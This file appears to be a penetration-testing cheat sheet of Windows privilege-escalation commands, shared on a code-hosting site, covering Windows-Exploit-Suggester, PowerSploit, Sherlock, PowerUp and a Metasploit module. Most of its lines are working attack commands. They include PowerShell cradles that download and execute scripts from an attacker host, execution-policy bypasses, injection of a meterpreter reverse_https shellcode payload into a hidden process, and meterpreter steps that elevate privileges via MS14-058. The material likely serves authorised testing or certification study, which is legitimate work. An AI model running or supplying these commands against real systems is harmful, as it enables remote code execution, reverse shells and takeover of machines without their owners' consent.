-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathAutomated tools
59 lines (38 loc) · 2.5 KB
/
Automated tools
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
---------------------------Windows-Exploit-Suggester---------------------------
# update the database and copy the db file name in the output
python windows-exploit-suggester.py --update
# copy the systeminfo output from the low priilege shell in a file in your own server
# Check for possible exploits with the script
python windows-exploit-suggester.py --database <db file name> --systeminfo <file with systeminfo output>
---------------------------Powersploit---------------------------
# Reverse Shell
# download Code Execution PowerShell script "Invoke-ShellCode"
IEX (New-Object Net.WebClient).DownloadString("http://<targetip>:<port>/CodeExecution/Invoke-Shellcode.ps1")
# Inject payload into the current PowerShell process
Invoke-Shellcode -payload windows/meterpreter/reverse_https -Lhost <ip> -Lport <port> -Force
# inject into another process
Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden
Invoke-Shellcode -ProcessId <process id> -payload windows/meterpreter/reverse_https -Lhost <ip> -Lport <port> -Force
# setup a Multi Handler exploit and wait for a shell
---------------------------Sherlock---------------------------
# send the sherlock.ps1 file to low privileged shell and run it
echo IEX(New Object Net.WebClient).downloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile -
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/Sherlock.ps1') ; Find-AllVulns"
# If you have your ps1 file downloaded to the victim machine then run using this
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
# meterpreter commands
load powershell
getuid
powershell-import C:\tmp\Sherlock.ps1
powershell Find-MS14058
elevate ms14-058 smb
getuid
----------------------------------------PowerUp----------------------------------
# download PowerUp.ps1 and check for vulnerabilities
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/PowerUp.ps1') ; Invoke-AllChecks"
# change execution policy & download PowerUp.ps1 and check for vulnerabilities
powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://<ip>:<port>/powerup.ps1') ; Invoke-AllChecks"
# If you have your ps1 file downloaded to the victim machine then run using this
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
---------------------------Metasploit Local Exploit Suggester Module---------------------------
post/multi/recon/local_exploit_suggester